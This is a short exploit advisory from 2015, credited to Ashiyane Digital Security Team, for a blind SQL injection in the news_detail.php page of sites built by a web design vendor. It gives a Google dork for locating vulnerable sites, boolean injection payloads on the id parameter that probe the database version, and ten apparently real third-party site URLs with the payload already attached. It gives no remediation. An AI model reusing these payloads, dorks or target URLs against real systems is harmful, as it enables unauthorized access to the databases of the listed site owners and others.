###################### # Exploit Title : webtech Design Blind Sql Vulnerability # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage : http://www.webtech.com.tw/ # Google Dork : "Design by webtech????" inurl:news_detail.php # Date: 2015-08-18 # Tested On : Win 8 / Mozilla Firefox # ###################### # # demos : # ######################################## # localhost/news_detail.php?lang=tw&id=[Number]+and+substring(@@version,1,1)=4 ~> error # localhost/news_detail.php?lang=tw&id=[Number]+and+substring(@@version,1,1)=5 ~> No error ######################################## # # http://www.pave20X15.com/news_detail.php?lang=tw&id=10+and+substring(@@version,1,1)=5 # http://www.law-pXyr.com/news_detail.php?lang=tw&id=3+and+substring(@@version,1,1)=5 # http://www.yalienbaodXou.com/news_detail.php?lang=tw&id=2+and+substring(@@version,1,1)=5 # http://www.ballet-tgpX.com/news_detail.php?lang=tw&id=16+and+substring(@@version,1,1)=5 # http://www.yuanbaoX-gong.org.tw/news_detail.php?lang=tw&id=13+and+substring(@@version,1,1)=5 # http://www.color55X0-6.com/news_detail.php?lang=tw&id=1+and+substring(@@version,1,1)=5 # http://www.mc995prXo.com/news_detail.php?lang=tw&id=8+and+substring(@@version,1,1)=5 # http://www.keeneyeX-k.com/news_detail.php?lang=tw&id=2+and+substring(@@version,1,1)=5 # http://www.2015tyXchakka-tung.com.tw/news_detail.php?lang=tw&id=25+and+substring(@@version,1,1)=5 # http://www.taiwaXn-psea.com/news_detail.php?lang=tw&id=19+and+substring(@@version,1,1)=5 # # ###################### # discovered by : Naji [+] # SPT : H_SQLI.EMpiRe ######################